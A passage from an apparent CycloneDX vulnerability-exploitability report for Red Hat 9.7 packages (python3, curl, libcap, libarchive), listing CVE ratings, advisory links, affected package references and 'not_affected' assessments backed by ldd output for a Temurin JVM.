          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-4873",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw was found in curl. A remote attacker could exploit this by initiating an unencrypted connection (via IMAP, SMTP, or POP3) and then making a subsequent request to the same host that requires Transport Layer Security (TLS). Due to incorrect connection reuse, the subsequent request would bypass the TLS requirement, leading to the transmission of sensitive information in cleartext. This vulnerability, categorized as Cleartext Transmission of Sensitive Information (CWE-319), results in information disclosure.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4873"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4878",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        367
      ],
      "description": "A flaw was found in libcap. A local unprivileged user can exploit a Time-of-check-to-time-of-use (TOCTOU) race condition in the `cap_set_file()` function. This allows an attacker with write access to a parent directory to redirect file capability updates to an attacker-controlled file. By doing so, capabilities can be injected into or stripped from unintended executables, leading to privilege escalation.",
      "recommendation": "Upgrade libcap to version 2.48-10.el9_7.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4878"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/07/14"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/07/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/08/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/09/5"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/09/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12423"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12441"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13285"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:14162"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:14937"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4878"
        },
        {
          "url": "https://bugzilla.redhat.com/2451615"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447554"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451615"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4878"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-12441.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:12441"
        },
        {
          "url": "https://github.com/AndrewGMorgan/libcap_mirror/security/advisories/GHSA-f78v-p5hx-m7hh"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4878.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-13285.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4878"
        },
        {
          "url": "https://sites.google.com/site/fullycapable/release-notes-for-libcap#h.x4zn8j3lss6r"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8193-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4878"
        }
      ],
      "published": "2026-04-09T16:16:31+00:00",
      "updated": "2026-05-07T22:16:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.48-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcap@2.48-10.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-5121",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.",
      "recommendation": "Upgrade libarchive to version 3.5.3-9.el9_7",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5121"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10097"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11768"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12071"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13812"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:14937"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:16174"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8510"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8521"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8534"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8864"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8866"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8867"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8873"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8908"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9026"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9592"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9832"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5121"
        },
        {
          "url": "https://bugzilla.redhat.com/2449006"
        },
        {
          "url": "https://bugzilla.redhat.com/2452945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4424"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5121"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-8510.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:8510"
        },
        {
          "url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2934"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5121.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-8534.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
        }
      ],
      "published": "2026-03-30T08:16:18+00:00",
      "updated": "2026-05-12T10:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
